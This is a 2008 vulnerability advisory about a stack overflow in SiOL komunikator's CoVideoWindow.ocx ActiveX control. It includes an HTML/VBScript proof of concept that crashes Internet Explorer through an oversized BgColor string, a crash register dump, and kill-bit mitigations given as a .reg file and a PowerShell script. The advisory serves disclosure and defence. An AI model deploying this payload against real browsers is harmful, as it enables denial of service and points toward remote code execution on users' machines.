=========================================================================
SiOL komunikator IM ActiveX stack overflow condition
=========================================================================
Release date: 30.7.2008
Severity: Moderately critical
Impact: Stack overflow
Remote: Yes
Status: Unpatched
Software: SiOL Komunikator v1.3 (SLO_71130)
Tested on: Microsoft Windows XP SP3 / IE6 SP3
Developer: http://www.siol.net/
http://www.eyeball.com/
Disclosed by: Edi Strosar
Vendor's description of affected application:
=============================================
"SiOL komunikator is instant messaging software that supports complete communication with text messages, file exchange and the option of voice and video calls, without a telephone set and from any location where an Internet connection is available." (translated from the vendor's Slovenian description)
In short:
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator, offered by the SiOL (Slovenia On-Line) ISP.
Download link:
http://www.siol.net/spletne_storitve/siol_komunikator.aspx
ActiveX control overview:
=========================
Developer: Eyeball Networks, Inc.
Version: 5.0.907.1
Component: CoVideoWindow.ocx
GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
KillBitSet: False
Description:
============
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to a stack overflow condition in its BgColor() method, which may lead to remote code execution. The vulnerability could be exploited if a user with SiOL komunikator installed visits a specially crafted web page. Note that although the control is not marked safe for scripting or initialization in the registry, it implements IObjectSafety, so Internet Explorer will still instantiate and script it from a web page.
Proof of concept:
=================
The following test case will crash Internet Explorer:
<html>
<object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>
<input language=VBScript onclick=buffero() type=button value="Crash">
<script language = 'vbscript'>
Sub buffero()
crash = String(515000, unescape("%41"))
test.BgColor = crash
End Sub
</script>
</html>
Note: close all Internet Explorer instances before executing PoC!
Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.
Exception overview:
===================
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01
EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02
ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B
--> TEST [ECX],EAX
----------------------------------------------------------------
Mitigation:
===========
Set the kill bit for the control's CLSID (http://support.microsoft.com/kb/240797).
Paste the following text into a text editor such as Notepad, then save the file with the .reg file name extension and import it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]
"Compatibility Flags"=dword:00000400
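The same mitigation as a scripted check-and-set, added here as an example that is not part of the original advisory. It assumes an elevated PowerShell prompt; it reads any existing Compatibility Flags value and ORs the kill bit in rather than overwriting it, and it also covers the Wow6432Node view on 64-bit Windows, which the .reg file above does not.

```powershell
# Added example: set and verify the ActiveX kill bit for CoVideoWindow.ocx.
# CLSID is the one listed in the advisory; 0x400 is the documented kill-bit flag.
$Clsid   = '{CA06EE71-7348-44C4-9540-AAF0E6BD1515}'
$KillBit = 0x400
$ValueName = 'Compatibility Flags'

function Get-CompatKeyPaths {
    param([string]$Clsid)
    # 32-bit IE on 64-bit Windows reads the Wow6432Node view; include it only when it exists.
    $bases = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
    if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
        $bases += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    }
    foreach ($b in $bases) { Join-Path $b $Clsid }
}

function Get-CompatFlags {
    param([string]$KeyPath)
    if (-not (Test-Path $KeyPath)) { return 0 }
    $v = (Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    if ($null -eq $v) { return 0 }
    return [int]$v
}

function Test-KillBit {
    param([string]$KeyPath)
    return (((Get-CompatFlags $KeyPath) -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    param([string]$KeyPath)
    if (-not (Test-Path $KeyPath)) { New-Item -Path $KeyPath -Force | Out-Null }
    # OR the flag in so any compatibility flags already set for this control survive.
    $newFlags = (Get-CompatFlags $KeyPath) -bor $KillBit
    New-ItemProperty -Path $KeyPath -Name $ValueName -PropertyType DWord -Value $newFlags -Force | Out-Null
}

foreach ($key in Get-CompatKeyPaths -Clsid $Clsid) {
    if (Test-KillBit $key) {
        Write-Output "Kill bit already set: $key"
    } else {
        Set-KillBit $key
        Write-Output ("Kill bit set: {0} (verified: {1})" -f $key, (Test-KillBit $key))
    }
}
```

Close all Internet Explorer windows before running it; IE reads the ActiveX Compatibility keys when it starts, so open browsers keep the old behaviour until restarted.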
Timeline:
=========
12.07.2008 - initial developer notification
- no response
20.07.2008 - additional developer notification
- no response
30.07.2008 - public disclosure
Contact:
========
edi [dot] strosar [at] gmail [dot] com
Disclaimer:
===========
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.
=========================================================================